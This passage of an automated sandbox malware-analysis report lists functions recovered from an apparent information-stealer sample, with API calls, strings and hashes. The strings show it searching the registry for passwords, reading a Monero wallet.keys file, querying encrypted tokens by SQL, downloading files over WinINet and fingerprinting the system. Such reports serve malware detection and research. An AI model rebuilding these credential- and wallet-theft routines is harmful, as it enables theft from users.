                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: :
                                  • API String ID: 3191641157-3653984579
                                  • Opcode ID: 6705f9f468edbb18dc27cefb32937b1ab39da0d77eaed08558f8ec6505ef8e12
                                  • Instruction ID: 7a9dbe40c19df0e005f34a3c3e05f364f79e9bc78510dcedffc162d20eeb9383
                                  • Opcode Fuzzy Hash: 6705f9f468edbb18dc27cefb32937b1ab39da0d77eaed08558f8ec6505ef8e12
                                  • Instruction Fuzzy Hash: DE315471D0010AEBDB19EBF4DC59DFF7B74BB88345F108118F116A7250DA38A986CB56
                                  Function 005372D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00537314
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0053733A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005373B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0053740D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00537452
                                  • HeapFree.KERNEL32(00000000), ref: 00537459
                                  • task.LIBCPMTD ref: 00537555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: Password
                                  • API String ID: 2808661185-3434357891
                                  • Opcode ID: 6a9321d846bbf56764e3552c30e9333d11074cf8f87ac6e49fde77f1efe1cc86
                                  • Instruction ID: e2f775c54ffd5864743528227c92d50e2d012058272ba7dcf64210ef3d1596ab
                                  • Opcode Fuzzy Hash: 6a9321d846bbf56764e3552c30e9333d11074cf8f87ac6e49fde77f1efe1cc86
                                  • Instruction Fuzzy Hash: 8E611EB5D0425D9BDB24DB50CD55FEABBB8BF88300F0081E9E689A6141DB706BC9CF91
                                  Function 005360A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 005347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00534839
                                    • Part of subcall function 005347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00534849
                                  • InternetOpenA.WININET(00550DF7,00000001,00000000,00000000,00000000), ref: 0053610F
                                  • StrCmpCA.SHLWAPI(?,011FE878), ref: 00536147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0053618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005361B3
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 005361DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0053620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00536249
                                  • InternetCloseHandle.WININET(?), ref: 00536253
                                  • InternetCloseHandle.WININET(00000000), ref: 00536260
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 2ce347586e0f267dccc2164ffbf80a157b7fcd3e96eea86d874d997cd89c3344
                                  • Instruction ID: b92b47cebdf099ec745f24a3da73a6968e14b62ee46eca5d11763c5729ef916c
                                  • Opcode Fuzzy Hash: 2ce347586e0f267dccc2164ffbf80a157b7fcd3e96eea86d874d997cd89c3344
                                  • Instruction Fuzzy Hash: C75163B1940218BBEB24DF90DC49BEE7BB8FB84705F10C098B609A71C1DB746A85CF95
                                  Function 0053BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                  • lstrlen.KERNEL32(00000000), ref: 0053BC9F
                                    • Part of subcall function 00548E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00548E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0053BCCD
                                  • lstrlen.KERNEL32(00000000), ref: 0053BDA5
                                  • lstrlen.KERNEL32(00000000), ref: 0053BDB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: 75554f17aa95601f825ffc1a58f93b2896f5e279769980258a697fc8de0aec93
                                  • Instruction ID: 1475165f5049107c94ac630e81830f9a7a7ba18bf4d29f7efb82ddc07bf567d1
                                  • Opcode Fuzzy Hash: 75554f17aa95601f825ffc1a58f93b2896f5e279769980258a697fc8de0aec93
                                  • Instruction Fuzzy Hash: 65B16572950109ABEB44FBA0DC5AEEE7B3CFF94308F404559F506A2091EF346E49CB66
                                  Function 00546770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 673ee7016a4667cf5092df59a96c06d7508b6c1aeb9d77b08db5babf95205223
                                  • Instruction ID: a7eaad153d974f841703f693e68982b3fc45006a38b3e41404e47628209cdf8d
                                  • Opcode Fuzzy Hash: 673ee7016a4667cf5092df59a96c06d7508b6c1aeb9d77b08db5babf95205223
                                  • Instruction Fuzzy Hash: 3DF05E3090420AFFE3489FE0E90976C7B70FB46747F048198E60D86290D6784B829BDB
                                  Function 00534FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00534FCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00534FD1
                                  • InternetOpenA.WININET(00550DDF,00000000,00000000,00000000,00000000), ref: 00534FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00535011
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00535041
                                  • InternetCloseHandle.WININET(?), ref: 005350B9
                                  • InternetCloseHandle.WININET(?), ref: 005350C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: ebe366d8cb11f29a59d4b0c6a51e445674a14fb7bef46a33d28ab3117d9805f2
                                  • Instruction ID: a07c92de8168d66743a891a714574646a1dea3df33a1a672ad2d24e808fb97a8
                                  • Opcode Fuzzy Hash: ebe366d8cb11f29a59d4b0c6a51e445674a14fb7bef46a33d28ab3117d9805f2
                                  • Instruction Fuzzy Hash: 8D3118B4A40218ABDB24CF54DC89BDCBBB4FB48704F1081D9FA09A7281D7746EC58F99
                                  Function 00548100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,011FE218,00000000,?,00550E2C,00000000,?,00000000), ref: 00548130
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00548137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00548158
                                  • wsprintfA.USER32 ref: 005481AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2922868504-3474575989
                                  • Opcode ID: 53c207f5faf3b24a21a7facb90b63bba198e17c49318b4c587824293f1bd7754
                                  • Instruction ID: ce66fccb17d99f28ee1b6140a8aee1d61b49f8976c70a63e314d7b1cd9c57874
                                  • Opcode Fuzzy Hash: 53c207f5faf3b24a21a7facb90b63bba198e17c49318b4c587824293f1bd7754
                                  • Instruction Fuzzy Hash: FA211DB1E44219ABEB00DFD5CC49FAEBBB8FB44B54F104519F605BB280D77869018BA9
                                  Function 005483DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00548426
                                  • wsprintfA.USER32 ref: 00548459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0054847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0054848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00548499
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,011FE398,00000000,000F003F,?,00000400), ref: 005484EC
                                  • lstrlen.KERNEL32(?), ref: 00548501
                                  • RegQueryValueExA.ADVAPI32(00000000,011FE440,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00550B34), ref: 00548599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00548608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0054861A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 9868f708d7fe02eae814add7b6ea5cfea36c6411542ea289a3130c24818bb11b
                                  • Instruction ID: 3354ddb03b13e37476685b676d8f87c5072846bf30c7b82283ccade91015235c
                                  • Opcode Fuzzy Hash: 9868f708d7fe02eae814add7b6ea5cfea36c6411542ea289a3130c24818bb11b
                                  • Instruction Fuzzy Hash: 04210771900218ABEB64DB54DC85FE9B7B8FB88704F00C598A609A6180DF756A85CFD5
                                  Function 00547690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005476A4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 005476AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,011EBEF8,00000000,00020119,00000000), ref: 005476DD
                                  • RegQueryValueExA.ADVAPI32(00000000,011FE428,00000000,00000000,?,000000FF), ref: 005476FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00547708
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 322f1e570110e2e3403e6622c13cd737f4438c3805064252c81dd5a40db2e5f9
                                  • Instruction ID: 2f09d7d138d135becc4606eaac418980df92663ba29c9b59b494f56773723990
                                  • Opcode Fuzzy Hash: 322f1e570110e2e3403e6622c13cd737f4438c3805064252c81dd5a40db2e5f9
                                  • Instruction Fuzzy Hash: 1701A2B4A00308BFEB00DBE4DC49FADBBB8EB88745F008454FA08D7291D77899408B96
                                  Function 00547720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00547734
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0054773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,011EBEF8,00000000,00020119,005476B9), ref: 0054775B
                                  • RegQueryValueExA.ADVAPI32(005476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0054777A
                                  • RegCloseKey.ADVAPI32(005476B9), ref: 00547784
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: 3370fb4f6b394c233c7e4a3b0bde0336f09bdbb3fa829f771ae905f524a335ba
